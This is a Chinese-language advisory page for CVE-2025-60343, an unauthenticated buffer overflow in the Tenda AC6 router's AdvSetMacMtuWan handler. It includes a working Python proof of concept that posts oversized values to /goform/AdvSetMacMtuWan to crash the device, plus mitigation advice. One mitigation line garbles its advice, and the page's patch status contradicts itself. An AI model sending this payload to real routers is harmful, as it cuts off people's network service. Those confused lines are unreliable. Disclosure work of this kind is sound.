CVE-2025-60343 Tenda AC6 AdvSetMacMtuWan函数缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60343

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC6

漏洞概述

CVE-2025-60343是Tenda AC6路由器15.03.06.50版本中的一个高危安全漏洞。该漏洞位于AdvSetMacMtuWan函数中，攻击者可以通过向wanMTU、wanSpeed、cloneType、mac、serviceName、serverName、wanMTU2、wanSpeed2、cloneType2、mac2、serviceName2和serverName2等参数注入精心构造的恶意载荷来触发多个缓冲区溢出问题。成功利用此漏洞可导致设备拒绝服务（DoS），使路由器无法正常提供网络服务。由于该漏洞无需认证即可远程利用，且CVSS评分达到7.5分，对使用该设备的用户构成较高的安全风险。攻击者可通过互联网远程发起攻击，无需物理接触目标设备，这大大增加了漏洞的威胁程度。

技术细节

该漏洞为典型的缓冲区溢出（Buffer Overflow）类型安全缺陷。在Tenda AC6路由器固件15.03.06.50中，AdvSetMacMtuWan函数在处理用户输入的多个网络参数时，未对输入数据进行充分的边界检查。当攻击者向wanMTU、wanSpeed、cloneType、mac、serviceName、serverName等参数注入超长字符串时，溢出的数据会覆盖相邻内存区域，可能导致程序崩溃或执行任意代码。攻击者可通过构造包含大量字符的请求包来触发溢出条件，例如在mac参数中填充超过预期长度的数据。由于函数直接使用用户提供的数据而未进行长度验证，攻击者可以精确控制溢出内容。在未修复的设备上，攻击者可通过发送特制的HTTP请求到路由器的Web管理界面来触发漏洞，导致路由器服务中断或被攻击者完全控制。

攻击链分析

STEP 1

步骤1

攻击者识别目标Tenda AC6路由器，确认其运行15.03.06.50版本固件

STEP 2

步骤2

攻击者构造包含超长字符串的恶意HTTP POST请求，针对AdvSetMacMtuWan函数的多个参数

STEP 3

步骤3

向路由器的/goform/AdvSetMacMtuWan端点发送精心构造的载荷

STEP 4

步骤4

恶意载荷触发AdvSetMacMtuWan函数中的缓冲区溢出，覆盖关键内存区域

STEP 5

步骤5

漏洞利用成功，导致路由器服务中断（DoS）或可能被攻击者利用执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60343 PoC - Tenda AC6 Buffer Overflow in AdvSetMacMtuWan
# Target: Tenda AC6 Router (Firmware v15.03.06.50)

target_ip = "192.168.0.1"  # Default Tenda router IP
target_url = f"http://{target_ip}/goform/AdvSetMacMtuWan"

# Crafted payload with oversized parameters to trigger buffer overflow
payload = {
    'wanMTU': 'A' * 1000,  # Buffer overflow trigger
    'wanSpeed': 'B' * 1000,
    'cloneType': 'C' * 1000,
    'mac': 'D' * 1000,
    'serviceName': 'E' * 1000,
    'serverName': 'F' * 1000,
    'wanMTU2': 'G' * 1000,
    'wanSpeed2': 'H' * 1000,
    'cloneType2': 'I' * 1000,
    'mac2': 'J' * 1000,
    'serviceName2': 'K' * 1000,
    'serverName2': 'L' * 1000
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text[:200]}")
    print("[*] If device becomes unresponsive, DoS successful!")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

影响范围

Tenda AC6 < 15.03.06.51

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 禁用路由器的WAN口远程管理功能，将Web管理界面仅限于LAN侧访问；2) 在上游网络设备（如防火墙）上实施访问控制，阻止来自互联网对路由器80/443端口的访问；3) 监控路由器运行状态，发现异常立即重启恢复服务；4) 考虑更换为已停止支持的老旧设备，使用具有持续安全更新的替代产品。